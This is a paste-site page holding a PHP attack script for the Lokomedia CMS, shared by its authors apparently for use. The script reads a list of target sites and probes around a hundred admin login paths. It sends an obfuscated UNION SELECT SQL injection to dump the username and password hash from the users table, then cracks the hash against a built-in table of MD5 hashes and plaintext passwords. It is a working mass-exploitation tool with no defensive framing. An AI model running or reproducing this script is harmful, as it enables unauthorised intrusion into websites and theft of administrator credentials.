Script Exploit CMS Lokomedia

SUBMITTED BY: N0NN4ME

DATE: Oct. 28, 2016, 5:35 p.m.

FORMAT: Text only

SIZE: 11.0 kB

Raw Download

HITS: 1077

Report
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  5. // Lokomedia (SQL Injection) + Auto Scan Admin Login
  6. // enjoyyyy
  7. // Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa
  8. // greetz: res7ock crew - j*ncok Sec
  9. // usage: php namafile.php target.txt
  11. //HARAP TIDAK MENGGANTI COPYRIGHT JIKA KALIAN INGIN DIHARGAI ^^
  13. function cover() {
  14. print "[ =========================================================================== ]\n";
  15. print " --> Lokomedia (SQL Injection) + Auto Scan Admin Login <--\n";
  16. print " ## Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa ##\n";
  17. print " # greetz: res7ock crew - j*ncok Sec #\n";
  18. print "+++++++ usage: php namafile.php target.txt +++++++\n";
  19. print "[ =========================================================================== ]\n\n";
  20. }
  21. function ngcurl($url) {
  22. $curl = curl_init($url);
  23. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  24. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  25. $content = curl_exec($curl);
  26. curl_close($curl);
  27. return $content;
  28. }
  29. function simpen($isi) {
  30. $f = fopen("md5.txt", "a+");
  31. fwrite($f, "$isi\n");
  32. fclose($f);
  33. }
  35. $admin = array(
  36. 'adm/',
  37. '_adm_/',
  38. '_admin_/',
  39. '_administrator_/',
  40. 'operator/',
  41. 'sika/',
  42. 'develop/',
  43. 'ketua/',
  44. 'redaktur/',
  45. 'author',
  46. 'admin/',
  47. 'administrator/',
  48. 'adminweb/',
  49. 'user/',
  50. 'users/',
  51. 'dinkesadmin/',
  52. 'retel/',
  53. 'author/',
  54. 'panel/',
  55. 'paneladmin/',
  56. 'panellogin/',
  57. 'redaksi/',
  58. 'cp-admin/',
  59. 'master/',
  60. 'master/index.php',
  61. 'master/login.php',
  62. 'operator/index.php',
  63. 'sika/index.php',
  64. 'develop/index.php',
  65. 'ketua/index.php',
  66. 'redaktur/index.php',
  67. 'admin/index.php',
  68. 'administrator/index.php',
  69. 'adminweb/index.php',
  70. 'user/index.php',
  71. 'users/index.php',
  72. 'dinkesadmin/index.php',
  73. 'retel/index.php',
  74. 'author/index.php',
  75. 'panel/index.php',
  76. 'paneladmin/index.php',
  77. 'panellogin/index.php',
  78. 'redaksi/index.php',
  79. 'cp-admin/index.php',
  80. 'operator/login.php',
  81. 'sika/login.php',
  82. 'develop/login.php',
  83. 'ketua/login.php',
  84. 'redaktur/login.php',
  85. 'admin/login.php',
  86. 'administrator/login.php',
  87. 'adminweb/login.php',
  88. 'user/login.php',
  89. 'users/login.php',
  90. 'dinkesadmin/login.php',
  91. 'retel/login.php',
  92. 'author/login.php',
  93. 'panel/login.php',
  94. 'paneladmin/login.php',
  95. 'panellogin/login.php',
  96. 'redaksi/login.php',
  97. 'cp-admin/login.php',
  98. 'terasadmin/',
  99. 'terasadmin/index.php',
  100. 'terasadmin/login.php',
  101. 'rahasia/',
  102. 'rahasia/index.php',
  103. 'rahasia/admin.php',
  104. 'rahasia/login.php',
  105. 'dinkesadmin/',
  106. 'dinkesadmin/login.php',
  107. 'adminpmb/',
  108. 'adminpmb/index.php',
  109. 'adminpmb/login.php',
  110. 'system/',
  111. 'system/index.php',
  112. 'system/login.php',
  113. 'webadmin/',
  114. 'webadmin/index.php',
  115. 'webadmin/login.php',
  116. 'wpanel/',
  117. 'wpanel/index.php',
  118. 'wpanel/login.php',
  119. 'adminpanel/index.php',
  120. 'adminpanel/',
  121. 'adminpanel/login.php',
  122. 'adminkec/',
  123. 'adminkec/index.php',
  124. 'adminkec/login.php',
  125. 'admindesa/',
  126. 'admindesa/index.php',
  127. 'admindesa/login.php',
  128. 'adminkota/',
  129. 'adminkota/index.php',
  130. 'adminkota/login.php',
  131. 'admin123/',
  132. 'admin123/index.php',
  133. 'admin123/login.php',
  134. 'logout/',
  135. 'logout/index.php',
  136. 'logout/login.php',
  137. 'logout/admin.php',
  138. 'adminweb_setting',
  139. );
  140. $real_pass = array(
  141. "a66abb5684c45962d887564f08346e8d" => "admin123456",
  142. "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
  143. "c630643500720b255abb22e2ab2c31f6" => "sumedang123",
  144. "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
  145. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
  146. "93261ae77f0df5522dd9767203f3aa17" => "house69",
  147. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
  148. "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
  149. "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
  150. "fbff29af096fa646757ce8439b644714" => "vro190588",
  151. "1feadc10e93f2b64c65868132f1e72d3" => "agoes",
  152. "0192023a7bbd73250516f069df18b500" => "admin123",
  153. "7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
  154. "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
  155. "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
  156. "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
  157. "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
  158. "73acd9a5972130b75066c82595a1fae3" => "ADMIN",
  159. "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
  160. "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
  161. "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
  162. "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
  163. "5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
  164. "c21f969b5f03d33d43e04f8f136e7682" => "default",
  165. "1a1dc91c907325c69271ddf0c944bc72" => "pass",
  166. "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
  167. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  168. "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
  169. "c893bad68927b457dbed39460e6afd62" => "prueba",
  170. "b2ca9cfa6067282a031d28a54886822d" => "admin4343",
  171. "3a3795bb61d5377545b4f345ff223e3d" => "bingo",
  172. "e172dd95f4feb21412a692e73929961e" => "bismillah",
  173. "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
  174. "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
  175. "098f6bcd4621d373cade4e832627b4f6" => "test",
  176. "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
  177. "5985609a2dc01098797c94a43e0a1115" => "masarief",
  178. "21232f297a57a5a743894a0e4a801fc3" => "admin",
  179. "1870a829d9bc69abf500eca6f00241fe" => "wordpress",
  180. "126ac9f6149081eb0e97c2e939eaad52" => "blog",
  181. "fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
  182. "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
  183. "91f5167c34c400758115c2a6826ec2e3" => "administrador",
  184. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
  185. "c93ccd78b2076528346216b3b2f701e6" => "admin1234",
  186. "912ec803b2ce49e4a541068d495ab570" => "asdf",
  187. "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
  188. "e99a18c428cb38d5f260853678922e03" => "abc123",
  189. "a152e841783914146e4bcd4f39100686" => "asdfgh",
  190. "a384b6463fc216a5f8ecb6670f86456a" => "qwert",
  191. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
  192. "b59c67bf196a4758191e42f76670ceba" => "1111",
  193. "96e79218965eb72c92a549dd5a330112" => "111111",
  194. "4297f44b13955235245b2497399d7a93" => "123123",
  195. "c33367701511b4f6020ec61ded352059" => "654321",
  196. "81dc9bdb52d04dc20036dbd8313ed055" => "1234",
  197. "e10adc3949ba59abbe56e057f20f883e" => "123456",
  198. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
  199. "25d55ad283aa400af464c76d713c07ad" => "12345678",
  200. "25f9e794323b453885f5181f1b624d0b" => "123456789",
  201. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
  202. "befe9f8a14346e3e52c762f333395796" => "qawsed",
  203. "76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
  204. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  205. "bed128365216c019988915ed3add75fb" => "passw0rd",
  206. "21232f297a57a5a743894a0e4a801fc3" => "admin",
  207. "e10adc3949ba59abbe56e057f20f883e" => "123456",
  208. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
  209. "25d55ad283aa400af464c76d713c07ad" => "12345678",
  210. "f379eaf3c831b04de153469d1bec345e" => "666666",
  211. "96e79218965eb72c92a549dd5a330112" => "111111",
  212. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
  213. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
  214. "6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
  215. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
  216. "63a9f0ea7bb98050796b649e85481845" => "root",
  217. "4297f44b13955235245b2497399d7a93" => "123123",
  218. "c8837b23ff8aaa8a2dde915473ce0991" => "123321",
  219. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
  220. "4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
  221. "cc03e747a6afbbcbf8be7668acfebee5" => "test123",
  222. "62cc2d8b4bf2d8728120d052163a77df" => "demo123",
  223. "32250170a0dca92d53ec9624f336ca24" => "pass123",
  224. "46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
  225. "200820e3227815ed1756a6b531e7e0d2" => "qwe123",
  226. "c33367701511b4f6020ec61ded352059" => "654321",
  227. "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
  228. "172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
  229. "e924e336dcc4126334c852eb8fadd334" => "waskita1234",
  230. "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
  231. "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
  232. "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
  233. "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
  234. "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
  235. "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
  236. "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
  237. "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
  238. "5136850b6c8f3ebc66122188347efda0" => "adminku",
  239. "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
  240. "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
  241. "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
  242. "ecb4208ee41389259a632d3a733c2786" => "741908",
  243. "827ccb0eea8a706c4c34a16891f84e7b" => "12345",
  244. "855be097acdf2fea4e342615a154ca3c" => "tolol",
  245. "eeee80342778e7b497d507f89094b10d" => "master10",
  246. "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
  247. "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
  248. "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
  249. "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
  250. "058fe7f85df1e992ef7bf948f1db7842" => "404J",
  251. "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
  252. );
  253. $sites = explode("\n", file_get_contents($argv[1]));
  254. if(isset($argv[1])) {
  255. cover();
  256. foreach($sites as $url) {
  257. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
  258. $url = "http://$url";
  259. } else {
  260. $url = $url;
  261. }
  262. $statis = "";
  263. $sisa = "";
  264. $login = "";
  265. $param_list = array("statis","kategori","berita");
  266. $curl = ngcurl($url);
  267. $curl = str_replace("'", '"', $curl);
  268. foreach($param_list as $param) {
  269. preg_match_all("/$param-(.*?)\">/", $curl, $id);
  270. foreach($id[1] as $stat) {
  271. $pecah = explode("-", $stat);
  272. $statis .= $pecah[0];
  273. $sisa .= $pecah[1];
  274. break;
  275. }
  276. foreach($admin as $adminweb) {
  277. $curl_admin = ngcurl("$url/$adminweb");
  278. if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
  279. $login .= "$url/$adminweb";
  280. break;
  281. }
  282. }
  283. $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
  284. preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
  285. preg_match("/<li>(.*)<li>/", $up[1], $akun);
  286. $data = explode(" ", $akun[1]);
  287. print "[+] URL: $url\n";
  288. //print "[+] param: $param\n";
  289. if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
  290. if(preg_match("/indoxploit/", $sql)) {
  291. //print "[ Injection Successfully ]\n";
  292. if($data[0] == "" || $data[1] == "") {
  293. print "[+] Not Injected :(\n\n";
  294. break;
  295. } else {
  296. print "[+] username: ".$data[0]."\n";
  297. $passwd = $real_pass[$data[1]];
  298. if($passwd == "") {
  299. $passwd = $data[1];
  300. simpen($data[1]);
  301. }
  302. print "[+] password: $passwd\n";
  303. }
  304. if($login == "") {
  305. print "[+] Login Admin ga ketemu :(\n\n";
  306. } else {
  307. print "[+] Login: $login\n\n";
  308. }
  309. break;
  310. } else {
  311. print "[+] Not Injected :(\n\n";
  312. break;
  313. }
  314. } else {
  315. print "[+] Not Injected :(\n\n";
  316. break;
  317. }
  318. }
  319. }
  320. } else {
  321. print "usage: php ".$argv[0]." target.txt\n";
  322. }
  323. ?>
comments powered by Disqus